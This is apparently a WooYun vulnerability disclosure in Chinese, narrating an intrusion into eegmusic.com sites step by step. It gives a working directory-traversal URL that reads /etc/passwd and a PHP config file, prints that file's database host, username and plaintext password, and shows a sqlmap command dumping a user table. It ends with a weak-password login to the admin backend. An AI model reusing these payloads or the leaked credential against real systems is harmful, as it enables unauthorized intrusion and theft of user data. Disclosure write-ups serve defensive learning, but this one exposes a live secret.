WooYun.org

随手测试英皇娱乐，缘分呐。



1. 源于一处目录遍历

无意中发现http://eapa.eegmusic.com/ 存在一处目录遍历：

例如，下载passwd:

http://eapa.eegmusic.com/download.php?path=upload/../../../../../../../../etc/passwd

此处非root，无法下载shadow。

用nmap扫描发现，除了80端口，无其他对外开放的端口。

一个利用的技巧是：

a) 通过下载不存在的文件，暴路径

b) 通过是否报错No such file or directory，可猜文件夹(文件)是否存在



2. 在php文件中搜索敏感信息

因为权限较低，无法下载一些敏感的.bash_history文件，所以只能在有权限读的php文件中找数据了。

首先是找到了数据库账号：

http://eapa.eegmusic.com/download.php?path=upload/../../../../../../../..//home/eapa/config/DbConfig.php

'dbms' => 'Mysql',


        'dbhost' => '192.168.1.242',


        'dbname' => 'eapa',


        'username' => 'www-online',


        'password' => 'mini@)!)server',

然而，数据库在内网，无法直接外连。拿到账号不能直接利用。



3. 发现www和eapa位于同一IP

思路在这里稍微有些中断，因为eapa站点非常简单，实际已发现后台backend目录，但是并不在www目录下，无法直接通过现有域名直接访问，虽然我也可以猜一下vhosts.conf文件。

后来我试着在114best.com上面查对应IP是否还存在其他域名。惊奇地发现原来www官网也在上面。



4. 猜文件名

因为eapa位于/home/eapa/，于是我猜www位于/home/eegmusic下，运气挺好，猜中了。

（因为passwd文件中有该用户eegmusic）

然后我尝试去读了一些php文件，发现数据库账号都跟eapa一样的，没多大用。



5.发现SQL注射

当读到一个/news/content.php文件时，发现注射：

list($photo_image1, $photo_image2, $photo_size2) = db_selectrow_array($dbh_r, 'select photo_image1, photo_image2, photo_imagesize2 from news_photo where oid=? and status=1 order by sequence limit 1', $id);

确认SQL注射存在后，我用sqlmap拖下了user表（mysql账号不能写文件）：

sqlmap.py -u "http://www.eegmusic.com/news/content.php/view/1333*" -D eegmusic -T cms_user --dump

发现密码已加盐，而且是随机盐。并且salt是8位字母数字混合的。很难解开。



6. 用弱密码登录

不过在这个过程中，发现数据库中保存着少量的明文不加盐密码，非常弱：123456.

于是，我试着逐个用123456，当试到第二个的时候，就成功了。

提示需要修改密码，修改之后，成功登录后台！